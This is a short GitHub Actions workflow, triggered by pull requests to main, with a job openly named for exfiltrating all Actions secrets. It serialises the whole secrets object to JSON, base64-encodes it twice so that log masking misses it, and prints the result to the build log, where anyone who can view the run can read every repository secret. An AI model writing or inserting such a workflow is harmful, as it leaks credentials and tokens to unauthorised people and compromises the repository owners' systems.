on:
  pull_request:
    branches:
      - main

jobs:
  exfilitrating_all_gh_actions_secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Reference the secrets object
        run: |
          echo '${{ toJson(secrets) }}' | base64 | base64 > test.txt 
          cat test.txt
